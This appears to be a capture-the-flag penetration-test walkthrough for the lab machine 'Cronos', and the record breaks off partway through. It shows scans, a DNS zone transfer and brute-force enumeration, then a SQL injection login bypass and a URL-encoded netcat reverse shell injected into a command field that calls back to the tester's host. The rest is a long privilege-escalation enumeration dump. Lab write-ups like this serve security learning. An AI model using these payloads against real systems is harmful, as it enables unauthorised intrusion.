Pentest Report - Cronos
Enumeration
Port Scan
TCP
sudo nmap $1 -A -p- -sC -sV -Pn -oN nmap
Nmap scan report for 10.10.10.13
Host is up (0.044s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 18b973826f26c7788f1b3988d802cee8 (RSA)
| 256 1ae606a6050bbb4192b028bf7fe5963b (ECDSA)
|_ 256 1a0ee7ba00cc020104cda3a93f5e2220 (ED25519)
53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.10.3-P4-Ubuntu
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)UDP
sudo nmap $1 -sU -A --top-ports 25 --min-rate 5000 -oN nmap_udp
Nmap scan report for 10.10.10.13
Host is up (0.042s latency).
PORT STATE SERVICE VERSION
53/udp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.10.3-P4-Ubuntu
67/udp open|filtered dhcps
68/udp open|filtered dhcpc
69/udp closed tftp
111/udp open|filtered rpcbind
123/udp closed ntp
135/udp open|filtered msrpc
137/udp open|filtered netbios-ns
138/udp open|filtered netbios-dgm
139/udp open|filtered netbios-ssn
161/udp open|filtered snmp
162/udp open|filtered snmptrap
445/udp open|filtered microsoft-ds
500/udp open|filtered isakmp
514/udp open|filtered syslog
520/udp open|filtered route
631/udp closed ipp
998/udp closed puparp
1434/udp open|filtered ms-sql-m
1701/udp open|filtered L2TP
1900/udp open|filtered upnp
4500/udp open|filtered nat-t-ike
5353/udp open|filtered zeroconf
49152/udp open|filtered unknown
49154/udp open|filtered unknownVulnerability Scan
sudo nmap $1 -p- --script vuln --min-rate 800 -Pn -oN nmap_vuln
Nmap scan report for cronos.htb (10.10.10.13)
Host is up (0.042s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
| http-enum:
| /robots.txt: Robots file
| /css/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
|_ /js/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.DNS Enumeration
Query Domain Name
nslookup
> server <IP>
Default server: 10.10.11.166
Address: 10.10.11.166#53
> <IP>
;; communications error to 10.10.11.166#53: timed out
166.11.10.10.in-addr.arpa name = trick.htb
> Get DNS Records
nslookup -type=ANY site.site.com 0.0.0.0
nslookup -type=any cronos.htb 10.10.10.13
Server: 10.10.10.13
Address: 10.10.10.13#53
cronos.htb
origin = cronos.htb
mail addr = admin.cronos.htb
serial = 3
refresh = 604800
retry = 86400
expire = 2419200
minimum = 604800
cronos.htb nameserver = ns1.cronos.htb.
Name: cronos.htb
Address: 10.10.10.13Zone Transfer
dig axfr @10.10.10.13 cronos.htb
; <<>> DiG 9.18.12-1-Debian <<>> axfr @10.10.10.13 cronos.htb
; (1 server found)
;; global options: +cmd
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb. 604800 IN NS ns1.cronos.htb.
cronos.htb. 604800 IN A 10.10.10.13
admin.cronos.htb. 604800 IN A 10.10.10.13
ns1.cronos.htb. 604800 IN A 10.10.10.13
www.cronos.htb. 604800 IN A 10.10.10.13
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 40 msec
;; SERVER: 10.10.10.13#53(10.10.10.13) (TCP)
;; WHEN: Sat May 06 09:52:03 CEST 2023
;; XFR size: 7 records (messages 1, bytes 203)HTTP
Directory Brute Forcing
dirsearch -u http://{IP}/ -r --deep-recursive -F -t 100 -x 404,403,400,500
Target: http://cronos.htb:80/
[09:54:22] Starting:
[09:54:27] 200 - 924B - /js
[09:54:33] 200 - 925B - /css
[09:54:34] 200 - 0B - /favicon.ico
[09:54:35] 200 - 2KB - /index.php
[09:54:36] 200 - 924B - /js/ (Added to queue)
[09:54:41] 200 - 24B - /robots.txt
[09:54:44] 200 - 914B - /web.config
[09:54:45] Starting: js/
[09:54:53] 200 - 278KB - /js/app.js
Target: http://ns1.cronos.htb:80/
[09:54:30] Starting:
[09:54:43] 200 - 11KB - /index.html
Target: http://admin.cronos.htb:80/
[09:54:53] Starting:
[09:55:02] 200 - 0B - /config.php
[09:55:05] 200 - 2KB - /index.php
[09:55:05] 200 - 2KB - /index.php/login/
Target: http://www.cronos.htb:80/
[09:55:33] Starting:
[09:55:34] 200 - 928B - /js
[09:55:42] 200 - 929B - /css
[09:55:43] 200 - 0B - /favicon.ico
[09:55:44] 200 - 2KB - /index.php
[09:55:45] 200 - 928B - /js/ (Added to queue)
[09:55:48] 200 - 24B - /robots.txt
[09:55:51] 200 - 914B - /web.configSubdomain Enumeration
gobuster vhost -u http://cronos.htb -t 100 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt --append-domain -q -k --no-error
Found: admin.cronos.htb Status: 200 [Size: 1547]Spider/Crawling
gospider -s http://0.0.0.0 -t 50 -d 2 -o .
Fingerprint
Apache httpd 2.4.18 | PHP
Exploitation
Authentication Bypass - Login Page
By injecting SQL code into the login page located at admin.cronos.htb, we are able to bypass authentication, granting us access to /welcome.php.
Payload: admin'-- -
RCE - Insufficient Input Sanitization
If we intercept our post request in welcome.php, we can edit our command to be anything and the server will execute the command.
![[Pasted image 20230506101023.png]]
If we inject a URL encoded reverse shell payload in the command field, we can get a reverse shell.
command=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/bash+-i+2>%261|nc+10.10.14.13+445+>/tmp/fnc -nlvp 445
listening on [any] 445 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.13] 53720
bash: cannot set terminal process group (1321): Inappropriate ioctl for device
bash: no job control in this shell
www-data@cronos:/var/www/admin$Privilege Escalation
Full Linux Shell
python -c 'import pty;pty.spawn("/bin/bash")'
# script /dev/null -c bash
target@target:~/.ssh$ ^Z
zsh: suspended nc -nlvp 1234
stty raw -echo; fg
[1] + continued nc -nlvp 1234
target@target:~/.ssh$ export TERM=xtermEnumeration
Linenum Output
www-data@cronos:/tmp$ ./linenum.sh
./linenum.sh
### SYSTEM ##############################################
[-] Kernel information:
Linux cronos 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
[-] Kernel information (continued):
Linux version 4.4.0-72-generic (buildd@lcy01-17) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4) ) #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017
[-] Specific release information:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.2 LTS"
NAME="Ubuntu"
VERSION="16.04.2 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04.2 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
VERSION_CODENAME=xenial
UBUNTU_CODENAME=xenial
[-] Hostname:
cronos
### USER/GROUP ##########################################
[-] Current user/group info:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[-] Users that have previously logged onto the system:
Username Port From Latest
root tty1 Fri Jun 17 13:33:44 +0300 2022
noulis pts/0 10.10.14.141 Thu Jul 27 01:39:12 +0300 2017
[-] Who else is logged on:
11:14:21 up 26 min, 0 users, load average: 0.00, 0.08, 0.27
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
[-] Group memberships:
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
uid=101(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
uid=102(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
uid=103(systemd-bus-proxy) gid=105(systemd-bus-proxy) groups=105(systemd-bus-proxy)
uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm)
uid=105(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=106(lxd) gid=65534(nogroup) groups=65534(nogroup)
uid=107(mysql) gid=111(mysql) groups=111(mysql)
uid=108(messagebus) gid=112(messagebus) groups=112(messagebus)
uid=109(uuidd) gid=113(uuidd) groups=113(uuidd)
uid=110(dnsmasq) gid=65534(nogroup) groups=65534(nogroup)
uid=111(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=1000(noulis) gid=1000(noulis) groups=1000(noulis),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),117(lpadmin),118(sambashare)
uid=112(bind) gid=119(bind) groups=119(bind)
[-] It looks like we have some admin users:
uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm)
uid=1000(noulis) gid=1000(noulis) groups=1000(noulis),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),117(lpadmin),118(sambashare)
[-] Contents of /etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/bin/bash
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
noulis:x:1000:1000:Noulis Panoulis,,,:/home/noulis:/bin/bash
bind:x:112:119::/var/cache/bind:/bin/false
[-] Super user account(s):
root
[-] Are permissions on /home directories lax:
total 12K
drwxr-xr-x 3 root root 4.0K May 10 2022 .
drwxr-xr-x 23 root root 4.0K May 10 2022 ..
drwxr-xr-x 4 noulis noulis 4.0K May 10 2022 noulis
### ENVIRONMENTAL #######################################
[-] Environment information:
APACHE_PID_FILE=/var/run/apache2/apache2.pid
APACHE_RUN_USER=www-data
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
APACHE_LOG_DIR=/var/log/apache2
PWD=/tmp
LANG=C
APACHE_RUN_GROUP=www-data
SHLVL=2
APACHE_RUN_DIR=/var/run/apache2
APACHE_LOCK_DIR=/var/lock/apache2
_=/usr/bin/env
[-] Path information:
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
drwxr-xr-x 2 root root 4096 May 10 2022 /bin
drwxr-xr-x 2 root root 12288 May 10 2022 /sbin
drwxr-xr-x 2 root root 20480 May 10 2022 /usr/bin
drwxr-xr-x 2 root root 4096 May 10 2022 /usr/local/bin
drwxr-xr-x 2 root root 4096 May 10 2022 /usr/local/sbin
drwxr-xr-x 2 root root 12288 May 10 2022 /usr/sbin
[-] Available shells:
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash
/usr/bin/tmux
/usr/bin/screen
[-] Current umask value:
0022
u=rwx,g=rx,o=rx
[-] umask value as specified in /etc/login.defs:
UMASK 022
[-] Password and storage information:
PASS_MAX_DAYS 99999
PASS_MIN_DAYS 0
PASS_WARN_AGE 7
ENCRYPT_METHOD SHA512
### JOBS/TASKS ##########################################
[-] Cron jobs:
-rw-r--r-- 1 root root 797 Apr 9 2017 /etc/crontab
/etc/cron.d:
total 24
drwxr-xr-x 2 root root 4096 May 10 2022 .
drwxr-xr-x 95 root root 4096 May 10 2022 ..
-rw-r--r-- 1 root root 102 Apr 6 2016 .placeholder
-rw-r--r-- 1 root root 589 Jul 16 2014 mdadm
-rw-r--r-- 1 root root 670 Mar 1 2016 php
-rw-r--r-- 1 root root 191 Mar 22 2017 popularity-contest
/etc/cron.daily:
total 60
drwxr-xr-x 2 root root 4096 May 10 2022 .
drwxr-xr-x 95 root root 4096 May 10 2022 ..
-rw-r--r-- 1 root root 102 Apr 6 2016 .placeholder
-rwxr-xr-x 1 root root 539 Apr 6 2016 apache2
-rwxr-xr-x 1 root root 376 Mar 31 2016 apport
-rwxr-xr-x 1 root root 1474 Jan 17 2017 apt-compat
-rwxr-xr-x 1 root root 355 May 22 2012 bsdmainutils
-rwxr-xr-x 1 root root 1597 Nov 27 2015 dpkg
-rwxr-xr-x 1 root root 372 May 6 2015 logrotate
-rwxr-xr-x 1 root root 1293 Nov 6 2015 man-db
-rwxr-xr-x 1 root root 539 Jul 16 2014 mdadm
-rwxr-xr-x 1 root root 435 Nov 18 2014 mlocate
-rwxr-xr-x 1 root root 249 Nov 13 2015 passwd
-rwxr-xr-x 1 root root 3449 Feb 26 2016 popularity-contest
-rwxr-xr-x 1 root root 214 May 24 2016 update-notifier-common
/etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 May 10 2022 .
drwxr-xr-x 95 root root 4096 May 10 2022 ..
-rw-r--r-- 1 root root 102 Apr 6 2016 .placeholder
/etc/cron.monthly:
total 12
drwxr-xr-x 2 root root 4096 May 10 2022 .
drwxr-xr-x 95 root root 4096 May 10 2022 ..
-rw-r--r-- 1 root root 102 Apr 6 2016 .placeholder
/etc/cron.weekly:
total 24
drwxr-xr-x 2 root root 4096 May 10 2022 .
drwxr-xr-x 95 root root 4096 May 10 2022 ..
-rw-r--r-- 1 root root 102 Apr 6 2016 .placeholder
-rwxr-xr-x 1 root root 86 Apr 13 2016 fstrim
-rwxr-xr-x 1 root root 771 Nov 6 2015 man-db
-rwxr-xr-x 1 root root 211 May 24 2016 update-notifier-common
[-] Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
#
[-] Systemd timers:
NEXT LEFT LAST PASSED UNIT ACTIVATES
Sat 2023-05-06 12:00:10 EEST 45min left Sat 2023-05-06 10:48:09 EEST 26min ago snapd.refresh.timer snapd.refresh.service
Sat 2023-05-06 22:59:17 EEST 11h left Sat 2023-05-06 10:48:09 EEST 26min ago apt-daily.timer apt-daily.service
Sun 2023-05-07 11:03:20 EEST 23h left Sat 2023-05-06 11:03:20 EEST 11min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
3 timers listed.
Enable thorough tests to see inactive timers
### NETWORKING ##########################################
[-] Network and IP info:
ens160 Link encap:Ethernet HWaddr 00:50:56:b9:85:18
inet addr:10.10.10.13 Bcast:10.10.10.255 Mask:255.255.255.0
inet6 addr: dead:beef::250:56ff:feb9:8518/64 Scope:Global
inet6 addr: fe80::250:56ff:feb9:8518/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:449972 errors:0 dropped:0 overruns:0 frame:0
TX packets:360429 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:51524923 (51.5 MB) TX bytes:142920379 (142.9 MB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:2331 errors:0 dropped:0 overruns:0 frame:0
TX packets:2331 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
RX bytes:226377 (226.3 KB) TX bytes:226377 (226.3 KB)
[-] ARP history:
? (10.10.10.2) at 00:50:56:b9:9d:31 [ether] on ens160
[-] Nameserver(s):
nameserver 10.10.10.2
nameserver 8.8.8.8
[-] Default route:
default 10.10.10.2 0.0.0.0 UG 0 0 0 ens160
[-] Listening TCP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 10.10.10.13:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:953 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
[-] Listening UDP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
udp 0 0 10.10.10.13:53 0.0.0.0:* -
udp 0 0 127.0.0.1:53 0.0.0.0:* -
### SERVICES #############################################
[-] Running processes:
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.1 0.5 37936 6032 ? Ss 10:48 0:01 /sbin/init
root 2 0.0 0.0 0 0 ? S 10:48 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S 10:48 0:00 [ksoftirqd/0]
root 5 0.0 0.0 0 0 ? S< 10:48 0:00 [kworker/0:0H]
root 7 0.0 0.0 0 0 ? S 10:48 0:00 [rcu_sched]
root 8 0.0 0.0 0 0 ? S 10:48 0:00 [rcu_bh]
root 9 0.0 0.0 0 0 ? S 10:48 0:00 [migration/0]
root 10 0.0 0.0 0 0 ? S 10:48 0:00 [watchdog/0]
root 11 0.0 0.0 0 0 ? S 10:48 0:00 [kdevtmpfs]
root 12 0.0 0.0 0 0 ? S< 10:48 0:00 [netns]
root 13 0.0 0.0 0 0 ? S< 10:48 0:00 [perf]
root 14 0.0 0.0 0 0 ? S 10:48 0:00 [khungtaskd]
root 15 0.0 0.0 0 0 ? S< 10:48 0:00 [writeback]
root 16 0.0 0.0 0 0 ? SN 10:48 0:00 [ksmd]
root 17 0.0 0.0 0 0 ? SN 10:48 0:00 [khugepaged]
root 18 0.0 0.0 0 0 ? S< 10:48 0:00 [crypto]
root 19 0.0 0.0 0 0 ? S< 10:48 0:00 [kintegrityd]
root 20 0.0 0.0 0 0 ? S< 10:48 0:00 [bioset]
root 21 0.0 0.0 0 0 ? S< 10:48 0:00 [kblockd]
root 22 0.0 0.0 0 0 ? S< 10:48 0:00 [ata_sff]
root 23 0.0 0.0 0 0 ? S< 10:48 0:00 [md]
root 24 0.0 0.0 0 0 ? S< 10:48 0:00 [devfreq_wq]
root 28 0.0 0.0 0 0 ? S 10:48 0:00 [kswapd0]
root 29 0.0 0.0 0 0 ? S< 10:48 0:00 [vmstat]
root 30 0.0 0.0 0 0 ? S 10:48 0:00 [fsnotify_mark]
root 31 0.0 0.0 0 0 ? S 10:48 0:00 [ecryptfs-kthrea]
root 47 0.0 0.0 0 0 ? S< 10:48 0:00 [kthrotld]
root 48 0.0 0.0 0 0 ? S< 10:48 0:00 [acpi_thermal_pm]
root 49 0.0 0.0 0 0 ? S< 10:48 0:00 [bioset]
root 50 0.0 0.0 0 0 ? S< 10:48 0:00 [bioset]
root 51 0.0 0.0 0 0 ? S< 10:48 0:00 [bioset]
root 52 0.0 0.0 0 0 ? S< 10:48 0:00 [bioset]
root 53 0.0 0.0 0 0 ? S< 10:48 0:00 [bioset]
root 54 0.0 0.0 0 0 ? S< 10:48 0:00 [bioset]
root 55 0.0 0.0 0 0 ? S< 10:48 0:00 [bioset]
root 56 0.0 0.0 0 0 ? S< 10:48 0:00 [bioset]
root 57 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_0]
root 58 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_0]
root 59 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_1]
root 60 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_1]
root 67 0.0 0.0 0 0 ? S< 10:48 0:00 [ipv6_addrconf]
root 80 0.0 0.0 0 0 ? S< 10:48 0:00 [deferwq]
root 81 0.0 0.0 0 0 ? S< 10:48 0:00 [charger_manager]
root 131 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_2]
root 132 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_2]
root 133 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_3]
root 134 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_3]
root 135 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_4]
root 136 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_5]
root 137 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_4]
root 138 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_5]
root 139 0.0 0.0 0 0 ? S< 10:48 0:00 [vmw_pvscsi_wq_4]
root 140 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_6]
root 141 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_6]
root 143 0.0 0.0 0 0 ? S< 10:48 0:00 [bioset]
root 144 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_7]
root 147 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_7]
root 150 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_8]
root 151 0.0 0.0 0 0 ? S< 10:48 0:00 [kpsmoused]
root 154 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_8]
root 157 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_9]
root 160 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_9]
root 162 0.0 0.0 0 0 ? S< 10:48 0:00 [ttm_swap]
root 164 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_10]
root 167 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_10]
root 168 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_11]
root 170 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_11]
root 177 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_12]
root 178 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_12]
root 179 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_13]
root 180 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_13]
root 184 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_14]
root 186 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_14]
root 189 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_15]
root 191 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_15]
root 192 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_16]
root 195 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_16]
root 196 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_17]
root 198 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_17]
root 199 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_18]
root 201 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_18]
root 204 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_19]
root 206 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_19]
root 208 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_20]
root 211 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_20]
root 212 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_21]
root 214 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_21]
root 216 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_22]
root 218 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_22]
root 220 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_23]
root 222 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_23]
root 223 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_24]
root 224 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_24]
root 225 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_25]
root 226 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_25]
root 227 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_26]
root 228 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_26]
root 229 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_27]
root 230 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_27]
root 231 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_28]
root 232 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_28]
root 233 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_29]
root 234 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_29]
root 235 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_30]
root 236 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_30]
root 237 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_31]
root 238 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_31]
root 239 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_32]
root 240 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_32]
root 265 0.0 0.0 0 0 ? S 10:48 0:00 [kworker/u2:28]
root 266 0.0 0.0 0 0 ? S 10:48 0:00 [kworker/u2:29]
root 339 0.0 0.0 0 0 ? S< 10:48 0:00 [raid5wq]
root 364 0.0 0.0 0 0 ? S< 10:48 0:00 [kdmflush]
root 365 0.0 0.0 0 0 ? S< 10:48 0:00 [bioset]
root 375 0.0 0.0 0 0 ? S< 10:48 0:00 [kdmflush]
root 376 0.0 0.0 0 0 ? S< 10:48 0:00 [bioset]
root 393 0.0 0.0 0 0 ? S< 10:48 0:00 [bioset]
root 421 0.0 0.0 0 0 ? S 10:48 0:00 [jbd2/dm-0-8]
root 422 0.0 0.0 0 0 ? S< 10:48 0:00 [ext4-rsv-conver]
root 466 0.0 0.0 0 0 ? S< 10:48 0:00 [kworker/0:1H]
root 478 0.0 0.0 0 0 ? S< 10:48 0:00 [iscsi_eh]
root 488 0.0 0.0 0 0 ? S< 10:48 0:00 [ib_addr]
root 490 0.0 0.3 28500 3180 ? Ss 10:48 0:00 /lib/systemd/systemd-journald
root 498 0.0 0.0 0 0 ? S 10:48 0:00 [kauditd]
root 503 0.0 0.0 0 0 ? S< 10:48 0:00 [ib_mcast]
root 509 0.0 0.0 0 0 ? S< 10:48 0:00 [ib_nl_sa_wq]
root 513 0.0 0.0 0 0 ? S< 10:48 0:00 [ib_cm]
root 514 0.0 0.0 0 0 ? S< 10:48 0:00 [iw_cm_wq]
root 515 0.0 0.1 102968 1536 ? Ss 10:48 0:00 /sbin/lvmetad -f
root 517 0.0 0.0 0 0 ? S< 10:48 0:00 [rdma_cm]
